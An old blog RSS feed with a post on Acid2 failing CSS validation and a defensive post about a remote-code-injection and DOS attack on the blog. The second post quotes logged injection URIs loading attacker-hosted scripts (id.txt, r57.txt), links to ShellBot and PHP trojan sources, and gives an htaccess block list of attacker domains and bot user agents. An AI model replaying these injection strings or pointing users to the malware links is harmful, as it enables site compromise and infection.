<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; owned</title>
	<atom:link href="http://42.kaizeku.com/taxonomy/owned//feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>The Web Standard Group - ACID2 Test page Failed W3C CSS Validation</title>
		<link>http://42.kaizeku.com/owned/acid2-failed-w3c-css-validation/</link>
		<comments>http://42.kaizeku.com/owned/acid2-failed-w3c-css-validation/#comments</comments>
		<pubDate>Sat, 22 Dec 2007 14:53:25 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[owned]]></category>

		<category><![CDATA[acid2]]></category>

		<category><![CDATA[IE8]]></category>

		<category><![CDATA[validation]]></category>

		<category><![CDATA[w3c]]></category>

		<category><![CDATA[web standard group]]></category>

		<category><![CDATA[xhtml]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/owned/acid2-failed-w3c-css-validation/</guid>
		<description><![CDATA[<p>I'm following up recent announcements on IEBLOG <a href="http://blogs.msdn.com/ie/archive/2007/12/19/internet-explorer-8-and-acid2-a-milestone.aspx" rel="nofollow">Internet Explorer 8 and Acid2: A Milestone</a>. To my surprise, the <strong>Web Standard Groups ACID2</strong> Test Page doesn't conform to <strong>W3C CSS Validation</strong>. </p>

<h2 class="sep">The Errors</h2>
9 errors &#038; 31 warnings.
<pre class="prebox">
Sorry! We found the following errors
43 	 Parse Error - second two]
88 	.parser-container div 	Value Error : color orange is not a color value : orange
94 	.parser 	Property error doesn't exist : }
97 	.parser 	Property m rgin doesn't exist : 2em
97 	Parse error - Unrecognized };
99 	.parser 	Value Error : width only 0 can be a length. You must put an unit after your number : 200
100 	.parser 	Value Error : border Lexical error at line 96, column 38. Encountered: "e" (101), after : "! "error;
100 	.parser 	Value Error : border Parse error - Unrecognized }
101 	.parser 	Value Error : background Too many values or values are not recognized : red pink
</pre>
<ul>
	<li>W3c CSS Validation &#8594; <a href="http://jigsaw.w3.org/css-validator/validator?profile=css2&#038;warning=2&#038;uri=http%3A%2F%2Fwww.webstandards.org%2Ffiles%2Facid2%2Ftest.html">http://www.webstandards.org/files/acid2/test.html</a></li>
</ul>
<h2>Full page Screenshot</h2>
<p><a title="ACID2 failed W3C validation" href="http://www.shareapic.net/content.php?id=4999586&#038;owner=noah" rel="nofollow"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004999586.png" longdesc="http://www.shareapic.net/preview2/004999586.png" alt="ACID2 failed W3C validation" width="28" height="130" /></a></p>

]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>I&#8217;m following up recent announcements on IEBLOG <a href="http://blogs.msdn.com/ie/archive/2007/12/19/internet-explorer-8-and-acid2-a-milestone.aspx" rel="nofollow">Internet Explorer 8 and Acid2: A Milestone</a>. To my surprise, the <strong>Web Standard Groups ACID2</strong> Test Page doesn&#8217;t conform to <strong>W3C CSS Validation</strong>. </p>
<p><span id="more-105"></span></p>
<h2 class="sep">The Errors</h2>
<p>9 errors &#038; 31 warnings.</p>
<pre class="prebox" style="width:500px;overflow:auto">
Sorry! We found the following errors
43 	 Parse Error - second two]
88 	.parser-container div 	Value Error : color orange is not a color value : orange
94 	.parser 	Property error doesn't exist : }
97 	.parser 	Property m rgin doesn't exist : 2em
97 	Parse error - Unrecognized };
99 	.parser 	Value Error : width only 0 can be a length. You must put an unit after your number : 200
100 	.parser 	Value Error : border Lexical error at line 96, column 38. Encountered: "e" (101), after : "! "error;
100 	.parser 	Value Error : border Parse error - Unrecognized }
101 	.parser 	Value Error : background Too many values or values are not recognized : red pink
</pre>
<ul>
<li>W3c CSS Validation &rarr; <a href="http://jigsaw.w3.org/css-validator/validator?profile=css2&#038;warning=2&#038;uri=http%3A%2F%2Fwww.webstandards.org%2Ffiles%2Facid2%2Ftest.html">http://www.webstandards.org/files/acid2/test.html</a></li>
</ul>
<h2>Full page Screenshot</h2>
<p><a title="ACID2 failed W3C validation" href="http://www.shareapic.net/content.php?id=4999586&#038;owner=noah" rel="nofollow"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004999586.png" longdesc="http://www.shareapic.net/preview2/004999586.png" alt="ACID2 failed W3C validation" width="28" height="130" /></a></p>
<p><strong>Update:</strong> Just got ping from <a href="http://blog.kaizeku.com">chaoskaizer</a>. She said the CSS ERROR is part of the Web Standards Test Suit. </p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/owned/acid2-failed-w3c-css-validation/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#38; Trojan</title>
		<link>http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/</link>
		<comments>http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/#comments</comments>
		<pubDate>Fri, 21 Dec 2007 22:48:35 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[Amidalla]]></category>

		<category><![CDATA[libwww-perl]]></category>

		<category><![CDATA[owned]]></category>

		<category><![CDATA[packet spoofing]]></category>

		<category><![CDATA[PHP+Rst.S]]></category>

		<category><![CDATA[ShellBot.B]]></category>

		<category><![CDATA[Trojan]]></category>

		<category><![CDATA[wp]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/</guid>
		<description><![CDATA[<img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg' class="fl" alt='cat owned' longdesc="http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg"/>For this past three days this blog is suffering DOS attack . The attack is still alive now I don't think they will leave yet.

I cant banned this bot directly as they were sending <strong>forge packet</strong> (packet spoofing) as <strong>googlebot </strong> http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.
<pre class="prebox cl" style="height:100px">
OrgName:    Google Inc.
OrgID:      GOGL
Address:    1600 Amphitheatre Parkway
City:       Mountain View
StateProv:  CA
PostalCode: 94043
Country:    US
</pre>

<p class="padbox" style="background-color:#ffd">At the time being I blocked all remote streams from their random host *.com and "perl bot signature" but blocking will not stop them from hammering this site. I'll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later. </p>

<h2 class="sep">Type of injections</h2>
There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src="http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg" class="fl" alt="cat owned" longdesc="http://blog.kakkoi.net/wp-content/uploads/2007/12/owned.thumbnail.jpg" />For this past three days this blog is suffering DOS attack . The attack is still alive now I don&#8217;t think they will leave yet.</p>
<p>I cant banned this bot directly as they were sending <strong>forge packet</strong> (packet spoofing) as <strong>googlebot </strong> http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP.</p>
<pre class="prebox cl" style="height: 100px">
OrgName: Google Inc.
OrgID: GOGL
Address: 1600 Amphitheatre Parkway
City: Mountain View
StateProv: CA
PostalCode: 94043
Country: US</pre>
<p><span id="more-103"></span></p>
<p class="padbox notice">At the time being I blocked all remote streams from their random host *.com and &#8220;perl bot signature&#8221; but blocking will not stop them from hammering this site. I&#8217;ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later.</p>
<h2 class="sep">Type of injections</h2>
<p>There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page.</p>
<pre class="prebox">
/es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja
 gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt?
/order.php?wp=http://hom3.t35.com/xpl/hack/id.txt?</pre>
<p>To view the following source you need to exclude the website host from your anti-virus program.</p>
<ul>
<li> <strong>Perl/ShellBot.B trojan</strong> - http://hom3.t35.com/xpl/fidz/hack/bnc.txt</li>
<li> <strong>PHP/Rst.S Trojan</strong> - http://hom3.t35.com/xpl/fidz</li>
</ul>
<h2 class="cb">htaccess blocked bad Code Injector and Perl Bot (Botnet)</h2>
<p>If you has similar problems. you should block the following domain in your htaccess.<br />
mod_setenvif</p>
<pre class="prebox">
SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1
SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1
SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1
SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1

&lt;FilesMatch "(.*)"&gt;
Order Allow,Deny
Allow from all
Deny from env=codeinjector_ref
Deny from env=shell_bots
&lt;/FilesMatch&gt;
</pre>
<p>if u arent sure if you server support mod_setenvif wrap it like the below example.</p>
<pre>
&lt;IfModule mod_setenvif.c&gt;
#...replace this line with the above code...
&lt;/IfModule&gt;</pre>
<h2 class="sep">How to trap Perl Shell Bot</h2>
<p>We need a pattern to trap this bots. certainly we knew that these bots :</p>
<ul>
<li>doesn&#8217;t honor robot.txt</li>
<li>they crawl all subdirectory</li>
<li>they has a pattern URI request</li>
</ul>
<p>For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. alexa bot will be banned too as they dont honor robot.txt.</p>
<p>I&#8217;ll be updating this post from time to time. Do check the related articles on how to packet spoofing and validating forge/spoof packet.</p>
<h2 class="sep">Recent Scan &amp; Update</h2>
<p>The below list is automatically added.</p>
<dl id="code-injections" class="xoxo cf">
<dt class="title" style="border-top: 1px solid #eeeeee; padding: 3px 0pt; margin-top: 4px">December 24, 2007</dt>
<dd>ip: <tt>64.26.63.10</tt> param: <tt>login=</tt>,<tt>?</tt> inject: <tt>http://pawang.in/r57.txt</tt></dd>
<dt class="title" style="border-top: 1px solid #eeeeee; padding: 3px 0pt; margin-top: 4px">December 24, 2007</dt>
<dd>ip: <tt>64.26.63.10</tt> param: <tt>dir=</tt>,<tt>login=</tt> inject: <tt>http://pawang.in/r57.txt????</tt></dd>
<dt class="title" style="border-top: 1px solid #eeeeee; padding: 3px 0pt; margin-top: 4px">December 25, 2007</dt>
<dd>ip: <tt>59.158.128.138</tt> param: <tt>p=</tt>,<tt>:allinurl=</tt> inject: <tt>http://gw-gold.net/jpg/pictures/test.txt</tt></dd>
</dl>
<h2 class="sep">External Resources</h2>
<ul>
<li><a href="http://www.wireshark.org">Packet spoofing - http://www.wireshark.org</a></li>
<li><a href="http://www.eff.org/testyourisp/pcapdiff/">pcapdiff validate forged packet http://www.eff.org/testyourisp/pcapdiff/</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
